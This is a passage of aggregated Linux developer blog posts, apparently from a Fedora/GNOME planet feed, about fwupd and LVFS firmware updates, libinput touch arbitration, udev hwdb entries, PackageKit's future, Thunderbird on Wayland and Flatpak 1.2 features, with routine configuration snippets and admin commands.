One of the features in the soon-to-be-released libinput 1.13 is location-based touch arbitration. Touch arbitration is the process of discarding touch input on a tablet device while a pen is in proximity. Historically, this was provided by the kernel wacom driver but libinput has had userspace touch arbitration for quite a while now, allowing for touch arbitration where the tablet and the touchscreen part are handled by different kernel drivers.

Basic touch arbitratin is relatively simple: when a pen goes into proximity, all touches are ignored. When the pen goes out of proximity, new touches are handled again. There are some extra details (esp. where the kernel handles arbitration too) but let's ignore those for now.

With libinput 1.13 and in preparation for the Dell Canvas Dial Totem, the touch arbitration can now be limited to a portion of the screen only. On the totem (future patches, not yet merged) that portion is a square slightly larger than the tool itself. On normal tablets, that portion is a rectangle, sized so that it should encompass the users's hand and area around the pen, but not much more. This enables users to use both the pen and touch input at the same time, providing for bimanual interaction (where the GUI itself supports it of course). We use the tilt information of the pen (where available) to guess where the user's hand will be to adjust the rectangle position.

There are some heuristics involved and I'm not sure we got all of them right so I encourage you to give it a try and file an issue where it doesn't behave as expected.

A fwupd client side certificate

Posted by Richard Hughes on March 12, 2019 03:00 PM

In the soon-to-be-released fwupd 1.2.6 there’s a new feature that I wanted to talk about here, if nothing else to be the documentation when people find these files and wonder what they are. The fwupd daemon now creates a PKCS-7 client self-signed certificate at startup (if GnuTLS is enabled and new enough) – which creates the root-readable /var/lib/fwupd/pki/secret.key and world-readable /var/lib/fwupd/pki/client.pem files.

These certificates are used to sign text data sent to a remote server. At the moment, this is only useful for vendors who also have accounts on the LVFS, so that when someone in their QA team tests the firmware update on real hardware, they can upload the firmware report with the extra --sign argument to sign the JSON blob with the certificate. This allows the LVFS to be sure the report upload comes from the vendor themselves, and will in future allow the trusted so-called attestation DeviceChecksums a.k.a. the PCR0 to be set automatically from this report. Of course, the LVFS user needs to upload the certificate to the LVFS to make this work, although I’ve written this functionality and am just waiting for someone to review it.

It’ll take some time for the new fwupd to get included in all the major distributions, but when practical I’ll add instructions for companies using the LVFS to use this feature. I’m hoping that by making it easier to securely set the PCR0 more devices will have the attestation metadata needed to verify if the machine is indeed running the correct firmware and secure.

Of course, fwupd doesn’t care if the certificate is self-signed or is issued from a corporate certificate signing request. The files in /var/lib/fwupd/pki/ can be set to whatever policy is in place. We can also use this self-signed certificate for any future agent check-in which we might need for the enterprise use cases. It allows us send data from the client to a remote server and prove who the client is. Comments welcome.

Videos and Books in GNOME 3.32

Posted by Bastien Nocera on March 08, 2019 07:00 PM
GNOME 3.32 will very soon be released, so I thought I'd go back on a few of the things that happened with some of our content applications.

Videos
First, many thanks to Marta Bogdanowicz, Baptiste Mille-Mathias, Ekaterina Gerasimova and Andre Klapper who toiled away at updating Videos' user documentation since 2012, when it was still called “Totem”, and then again in 2014 when “Videos” appeared.

The other major change is that Videos is available, fully featured, from Flathub. It should play your Windows Movie Maker films, your circular wafers of polycarbonate plastic and aluminium, and your Devolver indie films. No more hunting codecs or libraries!

In the process, we also fixed a large number of outstanding issues, such as accommodating for the app menu's planned disappearance, moving the audio/video properties tab to nautilus proper, making the thumbnailer available as an independent module, making the MPRIS plugin work better and loads, loads mo.


Download on Flathub

Books

As Documents was removed from the core release, we felt it was time for Books to become independent. And rather than creating a new package inside a distribution, the Flathub version was updated. We also fixed a bunch of bugs, so that's cool :)
Download on Flathub

Weather

I didn't work directly on Weather, but I made some changes to libgweather which means it should be easier to contribute to its location database.

Adding new cities doesn't require adding a weather station by hand, it would just pick the closest one, and weather stations also don't need to be attached to cities either. They were usually attached to villages, sometimes hamlets!

The automatic tests are also more stringent, and test for more things, which should hopefully mean less bugs.

And even more Flatpaks

On Flathub, you'll also find some applications I packaged up in the last 6 months. First is Teo Thomson emulator, GBE+, a Game Boy emulator focused on accessories emulation, and a way to run your old Flash games offline.

Making the LVFS and fwupd work in the enterprise

Posted by Richard Hughes on March 04, 2019 04:24 PM

I’ve spent some time over the weekend thinking about how firmware updates should work when you’re an enterprise, i.e. when you’re responsible for more than about 100 broadly similar computers. Some companies using fwupd right now are managing over a 100,000 devices (!) using a variety of non-awesome workarounds. So far we’ve not had a very good story on how to make firmware updates for corporate or IoT “just work” as we’ve been concentrating on the desktop use-cases.

We’ve started working on some functionality in fwupd to install an optional “agent” that reports the versions of firmware installed to a central internal web service daily, so that the site admin can see what computers are not up-to-date with the latest firmware updates. I’d expect there the admin could also approve updates after in-house QA testing, and also rate-limit the flow of updates to hardware of the same type. The reference web app would visually look like some kind of dashboard, although I’d be happy to also plug this information into existing system management systems like Lenovo XClarity or even Red Hat Satellite. The deliverable here would be to provide the information and the mechanism that can be used to implement whatever policy the management console defines.

This stuff isn’t particularly relevant to the average Linux user, and enabling this special “enterprise mode” would involve spinning up a web app on the internal network, manually enabling a systemd timer on all clients in the enterprise and also perhaps setting up a LVFS mirror. The console certainly isn’t the kind of thing you’d run on the Internet or be provided by the LVFS.

If this sounds interesting, I’d love to hear some comments, feedback and wish list items. We’re at the pre-alpha stage right now and are just prototyping some toy code. Thanks!

Making ATA updates just work

Posted by Richard Hughes on February 27, 2019 04:56 PM

The fwupd project has supported updating the microcode on ATA devices for about a month, and StarLabs is shipping firmware on the LVFS already. More are coming, but as part of the end-to-end testing with various deliberately-unnamed storage vendors we hit a thorny issue.

Most drives require the firmware updater to use the so-called 0xE mode, more helpfully called ATA_SUBCMD_MICROCODE_DOWNLOAD_CHUNKS in fwupd. This command transfers chunks of firmware to the device, and then the ATA hardware waits for a COMRESET before switching to the new firmware version. On most drives you can also use 0x3 mode which downloads the chunks and switches to the new firmware straight away using ATA RESET. As in, your drive currently providing your root filesystem disconnects from your running system and then reconnects with the new firmware version running. The kernel should be okay with that (and seems to work for me), but various people have advised us it would be a good way to cause accidental Bad Things™ to happen, which certainly seems plausible. Needlessly to say, we defaulted to the safe 0xE mode in fwupd 1.2.4 and thus require the user to reboot to switch to the new firmware version.

The issue we found is that about half of the ATA drive vendors require the drive to receive a COMRESET before switching to the new firmware. Depending on your main system firmware (and seemingly, the phase of the moon) you might only get a COMRESET when the device is initially powered on, rather than during reset. This means we’d have to tell the user to shutdown and then manually restart their system rather than just doing a system restart, which means various fwupd front ends like GNOME Software and KDE discover would need updating with new strings and code. This isn’t exactly trivial for enterprise distros like RHEL, and fwupd doesn’t know the capabilities of the front-end so can’t do anything sensible like hold back the update.

Additionally, the failure mode of installing a firmware update and then just restarting rather than shutting down would be the firmware version would be unchanged on the next boot, and fwupd would recognize this and mark the update as failed. The user would then also be prompted to update the firmware on the device that they thought they just updated. As my boss would say, “disappointing”.

Complexity to the rescue! There is one extra little-used mode in the ATA specification, called 0xF. This command causes the drive to immediately switch to the new firmware version, which as we’ve previously lamented might cause data loss. We can however, use this new command on shutdown when the filesystems have all been remounted read only. In fwupd git master (which is what will become version 1.2.6) we actually install a /usr/lib/systemd/system-shutdown/fwupd.shutdown script which checks the history database, and activates the new firmware if there is any activation required. This way it’ll always come back with the new firmware version when the user restarts, regardless of how the storage vendor interpreted the ATA specification.

I guess I should also thank Mario Limonciello and the storage team at Dell for all the help with this. We’ll hopefully have some more good news to share soon.

Lenovo ThinkCentre joins the LVFS

Posted by Richard Hughes on February 26, 2019 08:06 AM

Lenovo ThinkPad and ThinkStation have already been using the LVFS for some time, with many models supported from each group. Now the first firmware for the ThinkCentre line of hardware has appeared. ThinkCentre machines are often found in the enterprise, often tucked neatly behind other hardware or under counter tops, working away for years without problems. With the LVFS support site administrators can now update firmware on machines either locally or using ssh. At the moment only the M625q model is listed as supported on the LVFS, but other models are in the pipeline and will appear when ready.

It’s been a good month for the LVFS, 6 new devices were added in the last month, and we celebrated the numerically significant 5 million firmware downloads. The move to the Linux Foundation is going well, and we’ll hopefully be moving the staging instance from a little VM to a proper cloud deployment, providing the scalability and uptime requirements we need for critical infrastructure like this. If all goes to plan the main instance will move after a few months of testing.

PackageKit is dead, long live, well, something else

Posted by Richard Hughes on February 14, 2019 06:01 PM

It’s probably no surprise to many of you that PackageKit has been in maintenance mode for quite some time. Although started over ten years ago (!) it’s not really had active maintenance since about 2014. Of course, I’ve still been merging PRs and have been slinging tarballs over the wall every few months, but nothing new was happening with the project, and I’ve worked on many other things since.

I think it’s useful for a little retrospective. PackageKit was conceived as an abstraction layer over about a dozen different package management frameworks. Initially it succeeded, with a lot of front ends UIs being written for the PackageKit API, making the Linux desktop a much nicer place for many years. Over the years, most package managers have withered and died, and for the desktop at least really only two remain, .rpm and .deb. The former being handled by the dnf PackageKit backend, and the latter by aptcc.

Canonical seems to be going all in on Snaps, and I don’t personally think of .deb files as first class citizens on Ubuntu any more – which is no bad thing. Snaps and Flatpaks are better than packages for desktop software in almost every way. Fedora is concentrating on Modularity and is joining with most of the other distros with a shared Flatpak and Flathub future and seems to be thriving because of it. If course, I’m missing out a lot of other distros, but from a statistics point of view they’re unfortunately not terribly relevant. Arch users are important, but they’re also installing primarily on the command line, not using an abstraction layer or GUI. Fedora is also marching towards an immutable base image using rpmostree, containers and flatpaks, and then PackageKit isn’t only not required, but doesn’t actually get installed at all in Fedora SilverBlue.

GNOME Software and the various KDE software centers already have an abstraction in the session; which they kind of have to to support per-user flatpak applications and per-user pet containers like Fedora Toolbox. I’ve also been talking to people in the Cockpit project and they’re in the same boat, and basically agree that having a shared system API to get the installed package list isn’t actually as useful as it used to be. Of course, we’ll need to support mutable systems for a long time (RHEL!) and so something has to provide a D-Bus interface to provide that. I’m not sure whether that should be dnfdaemon providing a PackageKit-compatible API, or it should just implement a super-simple interface that’s not using an API design from the last decade. At least from a gnome-software point of view it would just be one more plugin, like we have a plugin for Flatpak, a plugin for Snap, and a plugin for PackageKit.

Comments welcome.

Using fwupd and updating firmware without using the LVFS

Posted by Richard Hughes on February 14, 2019 12:43 PM

The LVFS is a webservice designed to allow system OEMs and ODMs to upload firmware easily, and for it to be distributed securely to tens of millions of end users. For some people, this simply does not work for good business reasons:

  • They don’t trust me, fwupd.org, GPG, certain OEMs or the CDN we use
  • They don’t want thousands of computers on an internal network downloading all the files over and over again
  • The internal secure network has no internet connectivity

For these cases there are a few different ways to keep your hardware updated, in order of simplicity:

Download just the files you need manually

Download the .cab files you found for your hardware and then install them on the target hardware via Ansible or Puppet using fwupdmgr install foo.cab — you can use fwupdmgr get-devices to get the existing firmware versions of all hardware. If someone wants to write the patch to add JSON/XML export to fwupdmgr that would be a very welcome thing indeed.

Download and deploy firmware as part of an immutable image

If you’re shipping an image, you can just dump the .cab files into a directory in the deployment along with something like /etc/fwupd/remotes.d/immutable.conf (only on fwupd >= 1.2.3):

[fwupd Remote]
Enabled=false
Title=Vendor (Automatic)
Keyring=none
MetadataURI=file:///usr/share/fwupd/remotes.d/vendor/firmware

Then once you disable the LVFS, running fwupdmgr or fwupdtool will use only the cabinet archives you deploy in your immutable image (or even from an .rpm for that matter). Of course, you’re deploying a larger image because you might have several firmware files included, but this is how Google ChromeOS is using fwupd.

Sync all the public firmware from the LVFS to a local directory

You can use Pulp to mirror the entire contents of the LVFS (not private or embargoed firmware, for obvious reasons). Create a repo pointing to PULP_MANIFEST and then sync that on a regular basis to download the metadata and firmware. The Pulp documentation can explain how to set all this up. Make sure the local files are available from a webserver in your private network using SSL.

Then, disable the LVFS by deleting/modifying lvfs.conf and then create a myprivateserver.conf file on the clients /etc/fwupd/remotes.d:

[fwupd Remote]
Enabled=true
Type=download
Keyring=gpg
MetadataURI=https://my.private.server/mirror/firmware.xml.gz
FirmwareBaseURI=https://my.private.server/mirror

Export a share to all clients

Again, use Pulp to create a big directory holding all the firmware (currently ~10GB), and keep it synced. This time create a NFS or Samba share and export it to clients. Map the folder on clients, and then create a myprivateshare.conf file in /etc/fwupd/remotes.d:

[fwupd Remote]
Enabled=false
Title=Vendor
Keyring=none
MetadataURI=file:///mnt/myprivateshare/fwupd/remotes.d/firmware.xml.gz
FirmwareBaseURI=file:///mnt/myprivateshare/fwupd/remotes.d

Create your own LVFS instance

The LVFS is a free software Python 3 Flask application and can be set up internally, or even externally for that matter. You have to configure much more this way, including things like generating your own GPG keys, uploading your own firmware and setting up users and groups on the server. Doing all this has a few advantages, namely:

  • You can upload your own private firmware and QA it, only pushing it to stable when ready
  • You don’t ship firmware which you didn’t upload
  • You can control the staged deployment, e.g. only allowing the same update to be deployed to 1000 servers per day
  • You can see failure reports from clients, to verify if the deployment is going well
  • You can see nice graphs about how many updates are being deployed across your organisation

I’m hoping to make the satellite deployment LVFS use cases more concrete, and hopefully add some code to the LVFS to make this easier, although it’s not currently required for any Red Hat customer. Certainly a “setup wizard” would make setting up the LVFS much easier than obscure commands on the console.

Comments welcome.

Adding entries to the udev hwdb

Posted by Peter Hutterer on February 14, 2019 01:40 AM

In this blog post, I'll explain how to update systemd's hwdb for a new device-specific entry. I'll focus on input devices, as usual.

What is the hwdb and why do I need to update it?

The hwdb is a binary database sitting at /etc/udev/hwdb.bin and /usr/lib/udev/hwdb.d. It is usually used to apply udev properties to specific devices, those properties are then picked up by other processes (udev builtins, libinput, ...) to apply device-specific behaviours. So you'll need to update the hwdb if you need a specific behaviour from the device.

One of the use-cases I commonly deal with is that some touchpad announces wrong axis ranges or resolutions. With the correct hwdb entry (see the example later) udev can correct these at device initialisation time and every process sees the right axis ranges.

The database is compiled from the various .hwdb files you have sitting on your system, usually in /etc/udev/hwdb.d and /usr/lib/hwdb.d. The terser format of the hwdb files makes them easier to update than, say, writing a udev rule to set those properties.

The full process goes something like this:

  • The various .hwdb files are installed or modified
  • The hwdb.bin file is generated from the .hwdb files
  • A udev rule triggers the udev hwdb builtin. If a match occurs, the builtin prints the to-be properties, and udev captures the output and applies it as udev properties to the device
  • Some other process (often a different udev builtin) reads the udev property value and does something.
On its own, the hwdb is merely a lookup tool though, it does not modify devices. Think of it as a virtual filing cabinet, something will need to look at it, otherwise it's just dead weight.

An example for such a udev rule from 60-evdev.rules contains:


IMPORT{builtin}="hwdb --subsystem=input --lookup-prefix=evdev:", \
RUN{builtin}+="keyboard", GOTO="evdev_end"
The IMPORT statement translates as "look up the hwdb, import the properties". The RUN statement runs the "keyboard" builtin which may change the device based on the various udev properties now set. The GOTO statement goes to skip the rest of the file.

So again, on its own the hwdb doesn't do anything, it merely prints to-be udev properties to stdout, udev captures those and applies them to the device. And then those properties need to be processed by some other process to actually apply changes.

hwdb file format

The basic format of each hwdb file contains two types of entries, match lines and property assignments (indented by one space). The match line defines which device it is applied to.

For example, take this entry from 60-evdev.hwdb:


# Lenovo X230 series
evdev:name:SynPS/2 Synaptics TouchPad:dmi:*svnLENOVO*:pn*ThinkPad*X230*
EVDEV_ABS_01=::100
EVDEV_ABS_36=::100
The match line is the one starting with "evdev", the other two lines are property assignments. Property values are strings, any interpretation to numeric values or others is to be done in the process that requires those properties. Noteworthy here: the hwdb can overwrite previously set properties, but it cannot unset them.

The match line is not specified by the hwdb beyond "it's a glob". The format to use is defined by the udev rule that invokes the hwdb builtin. Usually the format is:


someprefix:search criteria:
For example, the udev rule that applies for the match above is this one in 60-evdev.rules:

KERNELS=="input*", \
IMPORT{builtin}="hwdb 'evdev:name:$attr{name}:$attr{[dmi/id]modalias}'", \
RUN{builtin}+="keyboard", GOTO="evdev_end"
What does this rule do? $attr entries get filled in by udev with the sysfs attributes. So on your local device, the actual lookup key will end up looking roughly like this:

evdev:name:Some Device Name:dmi:bvnWhatever:bvR112355:bd02/01/2018:...
If that string matches the glob from the hwdb, you have a match.

Attentive readers will have noticed that the two entries from 60-evdev.rules I posted here differ. You can have multiple match formats in the same hwdb file. The hwdb doesn't care, it's just a matching system.

We keep the hwdb files matching the udev rules names for ease of maintenance so 60-evdev.rules keeps the hwdb files in 60-evdev.hwdb and so on. But this is just for us puny humans, the hwdb will parse all files it finds into one database. If you have a hwdb entry in my-local-overrides.hwdb it will be matched. The file-specific prefixes are just there to not accidentally match against an unrelated entry.

Applying hwdb updates

The hwdb is a compiled format, so the first thing to do after any changes is to run


$ systemd-hwdb update
This command compiles the files down to the binary hwdb that is actually used by udev. Without that update, none of your changes will take effect.

The second thing is: you need to trigger the udev rules for the device you want to modify. Either you do this by physically unplugging and re-plugging the device or by running


$ udevadm trigger
or, better, trigger only the device you care about to avoid accidental side-effects:

$ udevadm trigger /sys/class/input/eventXYZ
In case you also modified the udev rules you should re-load those too. So the full quartet of commands after a hwdb update is:

$ systemd-hwdb update
$ udevadm control --reload-rules
$ udevadm trigger
$ udevadm info /sys/class/input/eventXYZ
That udevadm info command lists all assigned properties, these should now include the modified entries.

Adding new entries

Now let's get down to what you actually want to do, adding a new entry to the hwdb. And this is where it also get's tricky to have a generic guide because every hwdb file has its own custom match rules.

The best approach is to open the .hwdb files and the matching .rules file and figure out what the match formats are and which one is best. For USB devices there's usually a match format that uses the vendor and product ID. For built-in devices like touchpads and keyboards there's usually a dmi-based match format (see /sys/class/dmi/id/modalias). In most cases, you can just take an existing entry and copy and modify it.

My recommendation is: add an extra property that makes it easy to verify the new entry is applied. For example do this:


# Lenovo X230 series
evdev:name:SynPS/2 Synaptics TouchPad:dmi:*svnLENOVO*:pn*ThinkPad*X230*
EVDEV_ABS_01=::100
EVDEV_ABS_36=::100
FOO=1
Now run the update commands from above. If FOO=1 doesn't show up, then you know it's the hwdb entry that's not yet correct. If FOO=1 does show up in the udevadm info output, then you know the hwdb matches correctly and any issues will be in the next layer.

Increase the value with every change so you can tell whether the most recent change is applied. And before your submit a pull request, remove the FOOentry.

Oh, and once it applies correctly, I recommend restarting the system to make sure everything is in order on a freshly booted system.

Troubleshooting

The reason for adding hwdb entries is always because we want the system to handle a device in a custom way. But it's hard to figure out what's wrong when something doesn't work (though 90% of the time it's a typo in the hwdb match).

In almost all cases, the debugging sequence is the following:

  • does the FOO property show up?
  • did you run systemd-hwdb update?
  • did you run udevadm trigger?
  • did you restart the process that requires the new udev property?
  • is that process new enough to have support for that property?
If the answer to all these is "yes" and it still doesn't work, you may have found a bug. But 99% of the time, at least one of those is a sound "no. oops.".

Your hwdb match may run into issues with some 'special' characters. If your device has e.g. an ® in its device name (some Microsoft devices have this), a bug in systemd caused the match to fail. That bug is fixed now but until it's available in your distribution, replace with an asterisk ('*') in your match line.

Greybeards who have been around since before 2014 (systemd v219) may remember a different tool to update the hwdb: udevadm hwdb --update. This tool still exists, but it does not have the exact same behaviour as systemd-hwdb update. I won't go into details but the hwdb generated by the udevadm tool can provide unexpected matches if you have multiple matches with globs for the same device. A more generic glob can take precedence over a specific glob and so on. It's a rare and niche case and fixed since systemd v233 but the udevadm behaviour remained the same for backwards-compatibility.

Happy updating and don't forget to add Database Administrator to your CV when your PR gets merged.

Thunderbird for Wayland

Posted by Martin Stransky on February 08, 2019 09:09 AM

While Firefox is already built with Wayland by Mozilla (thx. Mike Hommey) and also Fedora ships Firefox Wayland, Thunderbird users (me included) are missing it. But why to care about it anyway?

Wayland compositors have one great feature (at least for me), they perform screen scale independently on actual hardware. So I can set 200% desktop scale on semi HiDPI monitor (4K & 28″) and all Wayland applications work immediately at that scale without font adjustments/various DPI tweaks/etc.

So here comes the Thunderbird with Wayland backend. I generally did the package for my personal needs and you can have it too 🙂 Just get it from Fedora repos as

dnf install thunderbird-wayland

You’ll receive ‘Thunderbird on Wayland’ application entry which can be registered as default Mail at

Settings -> Details -> Default Applications

Some background info:  recent stable Thunderbird (thunderbird-60.5.0) is based on Firefox ESR60 line and I backported related parts from latest stable Firefox 65. Some code couldn’t be ported and there are still issues with Wayland backend (misplaced menus on multi-monitor setup for instances) so use the bird on your own risk.

 

childbird

Please welcome HP to the LVFS

Posted by Richard Hughes on February 01, 2019 08:50 PM

As some of you have successfully guessed, HP Inc have been testing the LVFS for a few months now. There are now a few devices by HP available in the stable metadata and there are many more devices planned. If you’ve got a Z2, Z6, Z8, Z440, Z640 or Z840 system then you might want to check for an update in the GNOME Software updates panel or using fwupdmgr update in the terminal. There are quite a few updates with important fixes for various CVEs. I don’t know how many different models of HP hardware they are planning to support, or the order that they will be uploaded but I’m happy with progress.

With the addition of HP, the LVFS now has most major OEMs uploading firmware. There are a few exceptions, but even seemingly-unlikely companies like Microsoft are still interested in shipping firmware on the LVFS in the future. If you want to know more about joining the LVFS, please just send me an email.

ATA/ATAPI Support in fwupd

Posted by Richard Hughes on January 30, 2019 08:17 AM

A few vendors have been testing the NVMe firmware update code, and so far so good; soon we should have three more storage vendors moving firmware to stable. A couple of vendors also wanted to use the hdparm binary to update SATA hardware that’s not using the NVMe specification. A quick recap of the difference:

  • NVMe: Faster, more expensive controller, one cut-out in the M.2 PCB header
  • SATA: Slower, less expensive to implement, standard SATA or PATA connector, or two cut-outs in the M.2 PCB header

I’ve just merged a plugin developed with the donation of hardware and support of Star Labs. Any ATA-compatible drive (even DVD drives) supporting ATA_OP_DOWNLOAD_MICROCODE should be updatable using this new plugin, but you need to verify the TransferMode (e.g. 0x3, 0x7 or 0xe) before attempting an update to prevent data loss. Rather than calling into hdparm and screenscraping the output, we actually set up the sg_io_hdr_t structure and CDB buffer in the fwupd plugin to ensure it always works reliably without any additional dependencies. We only use two ATA commands and we can share a lot of the infrastructure with other plugins. For nearly all protocols, on nearly all devices, updating firmware is really a very similar affair.

There should soon be firmware on the LVFS that updates the StarDrive in the Star Lite laptop. I opened up the Star Lite today to swap the M.2 SSD to one with an old version and was amazed to find that it’s 80% battery inside; it reminded me of the inside of an iPad. Really impressive engineering considering the performance.

If any vendor is interested in deploying updates on the LVFS using the new ata plugin please let me know. Comments welcome.

Whats new in Flatpak 1.2

Posted by Matthias Clasen on January 28, 2019 06:21 PM

Time flies, Flatpak 1.0 was released four months ago.  Today we released the next major version, Flatpak 1.2. Lets take a look at what’s new.

New User Experience

A lot of effort since 1.0 has gone into improving the commandline user experience. This includes everything from better progress reporting to search and completion.

I’ve already written a detailed post about this aspect of the Flatpak 1.2 work, so I not going to say much more about it here.

Life-cycle control

1.2 includes new commands which make it easier to manage running Flatpaks.

Like other containers, Flatpaks are just regular processes, so traditional tools like ps and kill can be used with them. But there is often a bit more to a Flatpak sandbox than just a single process – there’s a babysitter, and D-Bus proxies,  and it can be a little daunting to identify the right process to kill, in a process listing.

To make this easy and obvious, we’ve added two new commands, flatpak ps and flatpak kill. For now, flatpak ps just lists basic information, but it is the natural place to show e.g. resource consumption in the future.

This functionality is available to other Flatpak front ends as well, in the form of the FlatpakInstance API in libflatpak.

Logging

Installing software is serious business, and it is well worth keeping a record of changes over time.

Flatpak now logs changes to installations and installed apps in the systemd journal. We take advantage of the capabilities offered by the journal, and write structured logs that contain useful fields like the affected remote, the commit IDs, and so on.

A particularly nice feature of the journal is that it keeps track of the originator of changes for us, so even if Flatpaks system-helper service is modifying the system installation, we still record the user who initiated the change.

You can of course use journalctl to study these logs. We also added a flatpak history command, which may be a bit more convenient, since it offers filtering and display that is more tailored to the specfics of Flatpak.

In the ecosystem

Portals are an important part of the Flatpak approach, and we’ve made releases of the portals to go along with the new Flatpak.  The 1.2 release of the portals brings a new location portal, a new portal for toolkit settings, respecting desktop lockdown settings, and better validation of input in all portals.

Flatpak itself also got some changes that will improve sandboxing in the future. One noteworthy change is that Flatpak will now bind dconf defaults and locks into the sandbox.  This will become useful with the next GLib release, when GSettings will no longer be using the dconf backend, allowing us to close an all-to-common sandbox hole.

In a similar vein, Flatpak is now creating a fontconfig configuration snipplet that will be used by a future fontconfig release to map font directories to their caches.

The common theme in these changes is that the libraries in the runtime need some changes to work well in a sandboxed setting. Getting these changes in place takes time, but we’re making steady progress.

Over the fence

On the desktop side, both GNOME Settings and GNOME Software will show Flatpak permissions in more detail in their upcoming releases.

Looking ahead

Now that Flatpak 1.2 is out, we are getting  ready to unveil a much-improved Flathub. Stay tuned!

Security Enhancements to the LVFS

Posted by Richard Hughes on January 23, 2019 03:41 PM

I’ve just deployed two security enhancements to the LVFS. It’s important to note that is is proactive in response to suggestions from OEMs, and there has not been any security issue with the service.

  • All passwords will be upgraded to a modern PBKDF2, in our case using SHA256. By logging in to the LVFS your password is automatically upgraded and no manual action is required. Any user accounts that have not been used by this time next year will be sent an email to remind them.
  • Local users can now optionally secure their accounts using two factor authentication, in our case using OTP. Users can opt-in to 2FA in the usual “Profile” menu once logged in to the LVFS. In the profile section you can also test your OTP PIN before enabling it for your account. Two factor authentication is considered a very good way of securing your user account and is a very good idea for administrator, manager and QA user access levels. Although 2FA isn’t required for all account types at the moment, in the future we might tighten the security policy a little bit when we know it’s all working for everybody.

As a consequence of these changes, the login dialog for the LVFS now looks a little different. All the same buttons are there (forgot password etc) but now the login process is a 2-step process rather than a single process. For vendors using OAuth, nothing much changes, and if required 2FA should be enabled by your domain administrator rather than enabled on the LVFS. If anyone has any problems, please let me know.

Please welcome Star Labs to the LVFS

Posted by Richard Hughes on January 22, 2019 02:11 PM

A few weeks ago Sean from Star Labs asked me to start the process of joining the LVFS. Star Labs is a smaller Linux-friendly OEM based just outside London not far from where I grew up. We identified three types of firmware we could update, the system firmware, the EC firmware and the SSD firmware. The first should soon be possible with the recent pledge of capsule support from AMI, and we’ve got a binary for testing now. The EC firmware will need further work, although now I can get the IT8987 into (and out of) programming mode. The SSD firmware needed a fix to fwupd (to work around a controller quirk), but with the soon-to-be released fwupd it can already be updated:

Sean also shipped me some loaner hardware that could be recovered using manufacturing tools if I broke it, which makes testing the ITE EC flashing possible. The IT89 chip is subtly different to the IT87 chip in other hardware like the Clevo reference designs, but this actually makes it easier to support as there are fewer legacy modes. This will be a blog post all of it’s own.

In playing with hardware intermittently for a few weeks, I’ve got a pretty good feel for the “Lap Top” and “Star Lite” models. There is a lot to like, the aluminium cases feel both solid and tactile (like an XPS 13) and it feels really “premium” unlike the Clevo reference hardware. Star Labs doesn’t use the Clevo platform any more, which allows it to take some other bolder system design choices. Some things I love: the LED IPS screen, USB-C charging, the trackpad and keyboard. The custom keyboard design is actually a delight to use; I actually prefer it to my Lenovo P50 and XPS 13 for key-placement and key-travel. The touchpad seems responsive, and the virtual buttons work well unlike some of the other touchpads from other Linux-friendly OEMs. The battery life seems superb, although I’ve not really done enough discharge→charge→discharge cycles to be able to measure it properly. The front-facing camera is at the top of the bezel where it belongs, which is something the XPS 13 has only just fixed in the latest models. Nobody needs to see up my nose.

There are a few things that could be improved with the hardware in my humble opinion: The shiny bezel around the touchpad is somewhat distracting on an otherwise beautifully matte chassis. There is also only a microSD slot, when all my camera cards are full sized. The RAM is soldered in, and so can’t be upgraded in the future, and the case screws are not “captive” like the new Lenovos. It also doesn’t seem to have a ThunderBolt interface which might matter if you want to use this thing docked with a bazillion things plugged in. Some of these are probably cost choices, the Lap Top is significantly cheaper than the XPS 13 developer edition I keep comparing it against in my head.

I was also curious to try the vendor-supplied customized Ubuntu install which was supplied with it. It just worked, in every way, and for those installing other operating systems like Fedora or Arch all the different distros have been pre-tested with extra notes – a really nice touch. This is where Star Labs really shine, these guys really care about Linux and it shows. I’ve been impressed with the Lab Top and I’ll be sad to return it when all the hardware is supported by fwupd and firmware releases are available on the LVFS.

So, if you’re using Star Drive hardware already then upgrade fwupd to the latest development version, enable the LVFS testing remote using fwupdmgr enable-remote lvfs-testing and tell us how the process goes. For technical reasons you need to power down the machine and power it back up rather than just doing a “warm” reboot. In a few weeks we’ll do a proper fwupd release and push the firmware to stable.

Phoenix joins the LVFS

Posted by Richard Hughes on January 09, 2019 02:15 PM

Just like AMI, Phoenix is a huge firmware vendor, providing the firmware for millions of machines. If you’re using a ThinkPad right now, you’re most probably using Phoenix code in your mainboard firmware. Phoenix have been working with Lenovo and their ODMs on LVFS support for a while, fixing all the niggles that was stopping the capsule from working with the loader used by Linux. Phoenix can help customers build deliverables for the LVFS that use UX capsule support to make flashing beautiful, although it’s up to the OEM if that’s used or not.

It might seem slightly odd for me to be working with the firmware suppliers, rather than just OEMs, but I’m actually just doing both in parallel. From my point of view, both of the biggest firmware suppliers now understand the LVFS, and provide standards-compliant capsules by default. This should hopefully mean smaller Linux-specific OEMs like Tuxedo and Star Labs might be able to get signed UEFI capsules, rather than just getting a ROM file and an unsigned loader.

We’re still waiting for the last remaining huge OEM, but fingers crossed that should be any day now.

Fedora Firefox heads to updates with PGO/LTO.

Posted by Martin Stransky on January 08, 2019 10:29 AM

I’ve had lots of fun with GCC performance tuning at Fedora but without much results. When Mozilla switched its official builds to clang I considered that too due to difficulties with GCC PGO/LTO setup and inferior Fedora Firefox builds speed compared to Mozilla official builds.

That movement woke up GCC fans to parry that threat. Lots of arguments were brought  to that ticket about clang insecurity and missing features. More importantly upstream developer Honza Hubicka found and fixed profile data generation bug (beside the others) and Jakub Jelinek worked out a GCC bug which caused Firefox crash at startup.

That effort helped me to convince GCC to behave and thanks to those two guys Fedora can offer GCC Firefox builds with PGO (Profile-Guided Optimization) and LTO (Link-Time Optimization).

The new builds are waiting for you at Koji (Fedora 28, Fedora 29). Don’t hesitate to take them for a test drive, I use Speedometer as general browser responsibility benchmark. You can also compare them with official Mozilla builds which are built with clang PGO/LTO.

speedometer

Flatpak commandline design

Posted by Matthias Clasen on December 19, 2018 03:03 PM

Flatpak is made to run desktop apps, and there are apps like KDE Discover or GNOME Software that let you manage the Flatpak installations on your system.

Of course, we still need a way to handle Flatpak from the commandline. The flatpak commandline tool in 1.0 is powerful without being overwhelming (like git) and way friendlier than some other tools (for example, ostree).

But we can always do better. For Flatpak 1.2, we’ve gone back to the drawing board and did some designs for the commandline user experience (yes, that needs design too).

Powerful: Columns

Many Flatpak commands produce information in tabular form. You can list remotes, apps, documents, etc. And all these have a bunch information that can be displayed. It can be overwhelming when you only need a particular piece of information (and overflowing the available space in a terminal).

To help with that, we’ve introduced a –columns option which you select which information you want to see.

You can explore the available columns using –columns=help. In Flatpak 1.2, all the list-producing commands will support the –columns option: list, search, remotes, remote-ls, ps, history.

One nice side-effect of having –columns is that we can add more information to the output of these commands without overflowing the display, by adding optional columns that are not included in the default output.

Concise: Errors

